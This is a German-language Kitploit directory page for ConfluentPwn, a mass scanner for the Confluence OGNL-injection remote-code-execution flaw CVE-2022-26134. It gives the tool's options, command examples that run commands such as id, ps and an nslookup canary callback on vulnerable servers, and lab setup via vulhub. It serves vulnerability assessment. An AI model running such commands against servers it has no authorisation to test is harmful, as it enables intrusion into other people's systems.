Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ConfluentPwn — Atlassian Confluence unauthentifizierter ONGL-Injection Remote-Code-Ausführung-Scanner (CVE-2022-26134) | Kitploit
Tools/GitHubGitHub/redhuntlabs/confluentpwn
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubredhuntlabs/confluentpwn

ConfluentPwn

Atlassian Confluence unauthentifizierter ONGL-Injection Remote-Code-Ausführung-Scanner (CVE-2022-26134)

Repository anzeigen
1232vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ConfluentPwn

Confluence Pre-Auth ONGL-Injection Remote-Code-Execution-Scanner (CVE-2022-26134).

Verwendung

Die folgende GIF zeigt eine Demo der Nutzung des Tools:

tooldemo

Hier ist die Hilfeausgabe des Tools:

root@kitploit:~
$ ./cfscan -h

  +-------------------------------+
  |    C O N F L U E N T P W N    |
  +-------------------------------+

[+] ConfluentPwn von RedHunt Labs - Ein modernes Unternehmen für Angriffsflächenmanagement (ASM)
[+] Autor: Pinaki Mondal (RHL Research Team)
[+] Verfolgen Sie Ihre Angriffsfläche kontinuierlich mit https://redhuntlabs.com/nvadr.

Verwendung:
  -cmd string
        Befehl, der auf einem verwundbaren Confluence-Server ausgeführt werden soll. (Standard "id")
  -file string
        Datei mit einer Liste von Hosts, die gescannt werden sollen.
  -output string
        Ausgabedateipfad für die Scanergebnisse. (Standard "cfpwn-results.csv")
  -regex string
        Regex zum Abgleich des Antwortheaders für den ausgeführten Befehl.
  -threads int
        Anzahl der Threads, die beim Scannen verwendet werden sollen. (Standard 20)
  -timeout int
        HTTP-Timeout in Sekunden. (Standard 5)
  -user-agent string
        Benutzerdefinierte User-Agent-Zeichenfolge. (Standard "Mozilla/5.0 (ConfluentPwn) Chrome/95.0.4638.69 Safari/537.36")

Beispiele:
  ./cfscan 1.2.3.4:80 1.1.1.1:8080
  ./cfscan -file urls.txt
  ./cfscan -cmd 'nslookup xxxxxxxxxxxxxxxxx.canarytokens.com 1.1.1.1:80'
  ./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443

Ziele angeben

Ziele können auf zwei Arten angegeben werden:

  • Direkte Angabe von URLs über die Kommandozeile.
    root@kitploit:~
    ./cfscan target1 target2 ...
    
  • Angabe einer Datei mit einer Liste von URLs, die gescannt werden sollen, mit dem Argument -file.
    root@kitploit:~
    ./cfscan -file targets.txt
    

Gleichzeitigkeit, Timeouts und User-Agents

Die maximale Anzahl gleichzeitig zu verarbeitender Ziele kann mit dem Argument -threads gesteuert werden. Der Standardwert für die Gleichzeitigkeit ist 20.

Der HTTP-Timeout-Wert in Sekunden kann mit dem Argument -timeout angegeben werden. Der Standard-Timeout beträgt 5 Sekunden.

Ein benutzerdefinierter User-Agent kann mit dem Flag -user-agent angegeben werden, falls der Benutzer UA-Strings in seinen Protokollen verfolgen möchte.

Ausgabe

Die generierte Ausgabe wird in eine CSV-Datei geschrieben, deren Ziel mit dem Flag -output angegeben werden kann. Die standardmäßig erzeugte Ausgabedatei ist cfscan-results.csv.

Die Ausgabe enthält 4 Spalten:

  • Ziel
  • Confluence-Version
  • Verwundbarkeitsstatus
  • Befehlsausgabe

Befehlsangabe & Abgleich

Der Befehl, der auf einem verwundbaren Server ausgeführt werden soll, kann mit dem Argument -cmd angegeben werden. Ein regulärer Ausdruck wird angegeben, um die Ausgabe des Befehls abzugleichen – dieser kann mit dem Flag -regex festgelegt werden.

Der Standardbefehl, der ausgeführt wird, ist id, und der Regex zum Abgleich der Ausgabe des Befehls lautet uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\).

Die gemeinsame Verwendung der Flags sieht wie folgt aus:

root@kitploit:~
./cfscan -cmd 'id' -regex 'uid=\d+?\(\w+?\)\s*?gid=\d+?\(\w+?\)\s*groups=\d+?\(\w+?\)' https://1.1.1.1
./cfscan -cmd 'ps' -regex '^\s*PID\s*TTY\s*TIME\s*CMD' http://1.1.1.1:443

Einrichten einer Testumgebung

Wenn Sie das Tool oder die Sicherheitslücke im Allgemeinen testen möchten, können Sie hier nachschlagen: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134.

Der Installationsprozess ist recht einfach, die folgenden Befehle erledigen die Arbeit:

root@kitploit:~
$ mkdir confluentpwn && cd confluentpwn && wget https://raw.githubusercontent.com/vulhub/vulhub/master/confluence/CVE-2022-26134/docker-compose.yml
$ docker-compose up -d

Die App sollte nun unter http://localhost:8090 verfügbar sein.

Lizenz & Version

Das Tool ist unter der MIT-Lizenz lizenziert. Siehe LICENSE. Derzeit ist das Tool in Version v0.1.

Danksagung

Das Forschungsteam bei RedHunt Labs möchte vulhub für die Bereitstellung des Docker-Testimages danken.

Um mehr über unsere Plattform für das Management von Angriffsflächen zu erfahren, schauen Sie sich NVADR an.
Tool herunterladen